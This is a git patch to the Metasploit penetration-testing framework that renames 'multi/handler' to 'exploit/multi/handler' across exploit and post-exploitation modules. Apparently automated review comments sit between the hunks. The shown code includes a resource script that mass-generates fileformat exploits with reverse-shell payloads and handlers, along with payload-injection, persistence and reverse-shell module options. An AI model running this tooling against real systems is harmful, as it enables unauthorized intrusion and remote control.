From a53ca53a6a04a0460ac9a6e4957cb6675770e082 Mon Sep 17 00:00:00 2001
From: g0tmi1k
Date: Fri, 12 Jun 2015 21:23:51 +0100
Subject: [PATCH] Fix inconstancy - multi/handler
---
 .../browser/persits_xupload_traversal.rb | 2 +-
 .../windows/mssql/mssql_linkcrawler.rb | 22 +-
 .../post/multi/manage/shell_to_meterpreter.rb | 10 +-
 modules/post/multi/manage/system_session.rb | 6 +-
 .../manage/multi_meterpreter_inject.rb | 2 +-
 modules/post/windows/manage/payload_inject.rb | 6 +-
 msfcli | 4 +-
 scripts/meterpreter/duplicate.rb | 2 +-
 scripts/meterpreter/metsvc.rb | 4 +-
 scripts/meterpreter/multi_meter_inject.rb | 2 +-
 scripts/meterpreter/persistence.rb | 4 +-
 scripts/meterpreter/vnc.rb | 4 +-
 scripts/resource/fileformat_generator.rc | 146 +++++++++---------
 spec/msfcli_spec.rb | 12 +-
 14 files changed, 113 insertions(+), 113 deletions(-)
diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb
index 8d96cd5d2b..2441f5ff05 100644
--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory.
- You may want to combine this module with the use of multi/handler since a
+ You may want to combine this module with the use of exploit/multi/handler since a
 user would have to log for the payload to execute. }, 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
index 1d64c7ae25..e03b2907be 100644
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote If you are attempting to obtain multiple reverse shells using this module we recommend setting the "DisablePayloadHandler" advanced option to "true", and setting - up a multi/handler to run in the background as a job to support multiple incoming + up a exploit/multi/handler to run in the background as a job to support multiple incoming shells. If you are interested in deploying payloads to spefic servers this module also 
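Review bot: The new description line reads `up a exploit/multi/handler to run in the background`; the article should be `an`, since the module path now starts with a vowel sound. The same slip is introduced by this patch in the comments of shell_to_meterpreter.rb, system_session.rb and payload_inject.rb, which all now say `# Starts a exploit/multi/handler session`. Suggested wording here is `up an exploit/multi/handler to run in the background as a job to support multiple incoming`, and `# Starts an exploit/multi/handler session` for the three comments. The description string belongs to an initializer that begins and ends outside this hunk.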
@@ -89,17 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote # Define master array to keep track of enumerated database information masterList = Array.new - masterList[0] = Hash.new # Define new hash - masterList[0]["name"] = "" # Name of the current database server - masterList[0]["db_link"] = "" # Name of the linked database server - masterList[0]["db_user"] = "" # User configured on the database server link - masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges - masterList[0]["db_version"] = "" # Database version of the linked database server - masterList[0]["db_os"] = "" # OS of the linked database server - masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored - masterList[0]["done"] = 0 # Used to determine if linked need to be crawled + masterList[0] = Hash.new # Define new hash + masterList[0]["name"] = "" # Name of the current database server + masterList[0]["db_link"] = "" # Name of the linked database server + masterList[0]["db_user"] = "" # User configured on the database server link + masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges + masterList[0]["db_version"] = "" # Database version of the linked database server + masterList[0]["db_os"] = "" # OS of the linked database server + masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored + masterList[0]["done"] = 0 # Used to determine if linked need to be crawled - shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system + shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system # Setup query for gathering information from database servers versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\ 
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index 7038742da4..ab80250ffc 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', - [ true, 'Start an Exploit Multi Handler to receive the connection', true]) + [ true, 'Start an exploit/multi/handler to receive the connection', true]) ], self.class) deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64') end @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post if datastore['HANDLER'] listener_job_id = create_multihandler(lhost, lport, payload_name) if listener_job_id.blank? - print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.") + print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.") return nil end end @@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post timer += 1 end end - print_status('Stopping multi/handler') + print_status('Stopping exploit/multi/handler') framework.jobs.stop_job(listener_job_id) } end @@ -238,12 +238,12 @@ class Metasploit3 < Msf::Post return false end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihandler(lhost, lport, payload_name) pay = client.framework.payloads.create(payload_name) pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport - print_status('Starting exploit multi handler') + print_status('Starting exploit/multi/handler') if !check_for_listener(lhost, lport) # Set options for module mh = client.framework.exploits.create('multi/handler') diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 5aac76272c..299cd0a965 100644 --- a/modules/post/multi/manage/system_session.rb 
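Review bot: In the `@@ -101` hunk the failure message reports `datastore['LPORT']`, while the handler two lines above was created with the local `lport`; if those two can differ (`lport` is assigned outside this hunk, so I cannot confirm from here), the message would name a port that was never bound. Reporting the value actually passed keeps the message truthful: `print_error("Failed to start exploit/multi/handler on #{lport}, it may be in use by another process.")`. The enclosing method starts and ends outside this hunk.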
+++ b/modules/post/multi/manage/system_session.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', - [ true, 'Start an Exploit Multi Handler to receive the connection', false]), + [ true, 'Start an exploit/multi/handler to receive the connection', false]), OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell', 'auto', ['auto','ruby','python','perl','bash']]) ], self.class) @@ -111,12 +111,12 @@ class Metasploit3 < Msf::Post return conflict end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihand(lhost,lport) pay = client.framework.payloads.create("generic/shell_reverse_tcp") pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport - print_status("Starting exploit multi handler") + print_status("Starting exploit/multi/handler") if not check_for_listner(lhost,lport) # Set options for module mul = client.framework.exploits.create("multi/handler") diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 58ba395bd1..222a7b9784 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]), OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]), OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']), - OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false]), + OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]), OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1]) ], self.class) 
diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 8ba2e5a8a9..10c6317646 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']), OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), - OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]), + OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]), OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]), OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1]) ], self.class) @@ -112,9 +112,9 @@ class Metasploit3 < Msf::Post return pay end - # Starts a multi/handler session + # Starts a exploit/multi/handler session def create_multihand(pay,pay_name,lhost,lport) - print_status("Starting exploit multi handler") + print_status("Starting exploit/multi/handler") if not check_for_listner(lhost,lport) # Set options for module mul = client.framework.exploits.create("multi/handler") diff --git a/msfcli b/msfcli index 37c1e214ac..911b32e920 100755 --- a/msfcli +++ b/msfcli @@ -95,7 +95,7 @@ class Msfcli $stdout.puts "Error: #{str}\n\n" if str $stdout.puts tbl.to_s + "\n" $stdout.puts "Examples:" + "\n" - $stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n" + $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n" $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n" $stdout.puts extra + "\n" if extra $stdout.puts 
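Review bot: The usage example in the `@@ -95` hunk now reads `msfcli exploit/multi/handler payload=...`, but nothing in this patch shows msfcli accepting the type-prefixed form: spec/msfcli_spec.rb renames its context to 'with exploit/multi/handler' yet still passes `'multi/handler'` as the module name. If msfcli resolves only the bare refname, users who copy the example will get a module-not-found error. Either confirm the fullname form is accepted or add a spec example that drives msfcli with `exploit/multi/handler`, so the documented invocation stays covered. The usage method begins and ends outside this hunk.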
@@ -542,7 +542,7 @@ class Msfcli show_payloads(modules) end when "t" - puts + puts if modules[:module].file_path =~ /auxiliary\//i $stdout.puts("\nError: This type of module does not support targets") else diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 89caeba6ca..080f9ded93 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -23,7 +23,7 @@ opts = Rex::Parser::Arguments.new( "-e" => [ true, "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."], "-P" => [ true, "Process id to inject into; use instead of -e if multiple copies of one executable are running."], "-s" => [ false, "Spawn new executable to inject to. Only useful with -P."], - "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"] + "-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"] ) # diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb index 253de080f8..7eafcef435 100644 --- a/scripts/meterpreter/metsvc.rb +++ b/scripts/meterpreter/metsvc.rb @@ -18,7 +18,7 @@ session = client opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"], - "-A" => [ false, "Automatically start a matching multi/handler to connect to the service"] + "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"] ) # Exec a command and return the results @@ -117,7 +117,7 @@ if client.platform =~ /win32|win64/ end # - # Setup the multi/handler if requested + # Setup the exploit/multi/handler if requested # if(autoconn) print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...") diff --git a/scripts/meterpreter/multi_meter_inject.rb b/scripts/meterpreter/multi_meter_inject.rb index 36a36e7f58..575c24f8ad 100644 
--- a/scripts/meterpreter/multi_meter_inject.rb +++ b/scripts/meterpreter/multi_meter_inject.rb @@ -21,7 +21,7 @@ start_handler = nil @exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4444)"], - "-m" => [ false, "Start Exploit multi/handler for return connection"], + "-m" => [ false, "Start exploit/multi/handler for return connection"], "-pt" => [ true, "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"], "-mr" => [ true, "Provide Multiple IP Addresses for Connections separated by comma."], "-mp" => [ true, "Provide Multiple PID for connections separated by comma one per IP."] diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb index f9edcd7f90..9cfd185d25 100644 --- a/scripts/meterpreter/persistence.rb +++ b/scripts/meterpreter/persistence.rb @@ -35,7 +35,7 @@ script_on_target = nil "-X" => [ false, "Automatically start the agent when the system boots"], "-U" => [ false, "Automatically start the agent when the User logs on"], "-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"], - "-A" => [ false, "Automatically start a matching multi/handler to connect to the agent"], + "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"], "-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."], "-T" => [ true, "Alternate executable template to use"], "-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."] @@ -237,7 +237,7 @@ raw = create_payload(payload_type, rhost, rport) script = create_script(delay, altexe, raw, payload_type.include?('/x64/')) script_on_target = write_script_to_target(target_dir, script) -# Start Multi/Handler +# Start exploit/multi/handler if autoconn set_handler(payload_type, rhost, rport) end 
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb index 8151145334..2ebfd24bae 100644 --- a/scripts/meterpreter/vnc.rb +++ b/scripts/meterpreter/vnc.rb @@ -21,7 +21,7 @@ opts = Rex::Parser::Arguments.new( "-v" => [ true, "The local port for the VNC proxy service (default: 5900)"], "-i" => [ false, "Inject the vnc server into a new process's memory instead of building an exe"], "-P" => [ true, "Executable to inject into (starts a new process). Only useful with -i (default: notepad.exe)"], - "-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"], + "-D" => [ false, "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"], "-O" => [ false, "Disable binding the VNC proxy to localhost (open it to the network)"], "-V" => [ false, "Disable the automatic launch of the VNC client"], "-t" => [ false, "Tunnel through the current session connection. (Will be slower)"], @@ -176,7 +176,7 @@ else end if tunnel - # Set up a port forward for the multi/handler to use for uploading the stage + # Set up a port forward for the exploit/multi/handler to use for uploading the stage print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}") client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}") end diff --git a/scripts/resource/fileformat_generator.rc b/scripts/resource/fileformat_generator.rc index 3e3a5657ff..96cbff3208 100644 --- a/scripts/resource/fileformat_generator.rc +++ b/scripts/resource/fileformat_generator.rc 
@@ -1,42 +1,42 @@ if (framework.datastore['WIN_PAYL'] != nil) - winpayl = framework.datastore['WIN_PAYL'] + winpayl = framework.datastore['WIN_PAYL'] else - # no payload defined -> we use a messagebox payload :) - winpayl = "windows/messagebox" + # no payload defined -> we use a messagebox payload :) + winpayl = "windows/messagebox" end if (framework.datastore['OSX_PAYL'] != nil) - osxpayl = framework.datastore['OSX_PAYL'] + osxpayl = framework.datastore['OSX_PAYL'] else - # no payload defined -> we use a generic bind payload :) - osxpayl = "generic/shell_bind_tcp" + # no payload defined -> we use a generic bind payload :) + osxpayl = "generic/shell_bind_tcp" end if (framework.datastore['MULTI_PAYL'] != nil) - multipayl = framework.datastore['MULTI_PAYL'] + multipayl = framework.datastore['MULTI_PAYL'] else - # no payload defined -> we use a generic bind payload :) - multipayl = "generic/shell_bind_tcp" + # no payload defined -> we use a generic bind payload :) + multipayl = "generic/shell_bind_tcp" end if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/)) - print_error("please define a global LHOST Variable") - return + print_error("please define a global LHOST Variable") + return else - localIP = framework.datastore['LHOST'] + localIP = framework.datastore['LHOST'] end if (framework.datastore['VERBOSE'] == "true") - verbose = 1 #true + verbose = 1 #true else - verbose = 0 + verbose = 0 end if (framework.datastore['HANDLERS'] == "true") - handlers = 1 #true + handlers = 1 #true else - handlers = 0 + handlers = 0 end windows = false 
@@ -44,66 +44,66 @@ multi = false osx = false framework.exploits.each do |exploit,mod| - if(exploit.to_s =~ /fileformat/) - print_line("generating fileformat exploit: #{exploit.to_s}") - run_single("use #{exploit}") - if(exploit.to_s =~ /windows/) - #we need this info for starting the handlers - windows = true - #setting the payload - run_single("set PAYLOAD #{winpayl}") - if(winpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 4444") - end - elsif(exploit.to_s =~ /multi/) - #we need this info for starting the handlers - multi = true - #setting the payload - run_single("set PAYLOAD #{multipayl}") - if(winpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 5555") - end - elsif(exploit.to_s =~ /osx/) - #we need this info for starting the handlers - osx = true - #setting the payload - run_single("set PAYLOAD #{osxpayl}") - if(osxpayl =~ /reverse/) - run_single("set LHOST #{localIP}") - run_single("set LPORT 6666") - end - end - extension = active_module.datastore['FILENAME'].split('.').last - filename = exploit.split('/').last - run_single("set FILENAME #(unknown).#{extension}") - run_single("exploit") - print_line - end + if(exploit.to_s =~ /fileformat/) + print_line("generating fileformat exploit: #{exploit.to_s}") + run_single("use #{exploit}") + if(exploit.to_s =~ /windows/) + #we need this info for starting the handlers + windows = true + #setting the payload + run_single("set PAYLOAD #{winpayl}") + if(winpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 4444") + end + elsif(exploit.to_s =~ /multi/) + #we need this info for starting the handlers + multi = true + #setting the payload + run_single("set PAYLOAD #{multipayl}") + if(winpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 5555") + end + elsif(exploit.to_s =~ /osx/) + #we need this info for starting the handlers + osx = true + #setting the payload + run_single("set PAYLOAD #{osxpayl}") + 
if(osxpayl =~ /reverse/) + run_single("set LHOST #{localIP}") + run_single("set LPORT 6666") + end + end + extension = active_module.datastore['FILENAME'].split('.').last + filename = exploit.split('/').last + run_single("set FILENAME #(unknown).#{extension}") + run_single("exploit") + print_line + end end if(handlers == 1) - #starting some handlers for reverse connections - run_single("use multi/handler") - if(windows == true and winpayl =~ /reverse/) - run_single("set PAYLOAD #{winpayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 4444") - run_single("exploit -j") - end - if(multi == true and multipayl =~ /reverse/) - run_single("set PAYLOAD #{multipayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 5555") - run_single("exploit -j") - end - if(osx == true and osxpayl =~ /reverse/) - run_single("set PAYLOAD #{osxpayl}") - run_single("set LHOST #{localIP}") - run_single("set LPORT 6666") - run_single("exploit -j") - end + #starting some handlers for reverse connections + run_single("use exploit/multi/handler") + if(windows == true and winpayl =~ /reverse/) + run_single("set PAYLOAD #{winpayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 4444") + run_single("exploit -j") + end + if(multi == true and multipayl =~ /reverse/) + run_single("set PAYLOAD #{multipayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 5555") + run_single("exploit -j") + end + if(osx == true and osxpayl =~ /reverse/) + run_single("set PAYLOAD #{osxpayl}") + run_single("set LHOST #{localIP}") + run_single("set LPORT 6666") + run_single("exploit -j") + end end run_single("back") diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb index d37908ed00..ce31679cd5 100644 --- a/spec/msfcli_spec.rb +++ b/spec/msfcli_spec.rb @@ -289,8 +289,8 @@ describe Msfcli, :content do } end end - - + + context "#guess_nop_name" do subject(:guess_nop_name) { msfcli.guess_nop_name(nop_reference_name) 
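Review bot: In the `multi` branch of the fileformat loop the reverse check reads `if(winpayl =~ /reverse/)` although the payload just set is `multipayl`; the handler block at the end of the hunk tests `multipayl =~ /reverse/`, so a reverse multi payload paired with a bind Windows payload is generated without LHOST/LPORT while a handler is still started for it, and the opposite pairing sets them needlessly. The line should be `if(multipayl =~ /reverse/)`. This is pre-existing and only re-indented by the patch, but since every line of the block is touched here it is the natural moment to correct it.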
@@ -555,8 +555,8 @@ describe Msfcli, :content do expect(modules[:module].fullname).to eq(module_name) end end - - context 'with multi/handler' do + + context 'with exploit/multi/handler' do let(:module_name) { 'multi/handler' } @@ -571,14 +571,14 @@ describe Msfcli, :content do expect(modules[:module]).to be_an Msf::Exploit expect(modules[:module].refname).to eq(module_name) end - + context 'with payload' do let(:args) { super().tap { |args| args.insert(-2, "payload=#{payload_reference_name}") } } - + context 'windows/meterpreter/reverse_tcp' do let(:payload_reference_name) do 'windows/meterpreter/reverse_tcp'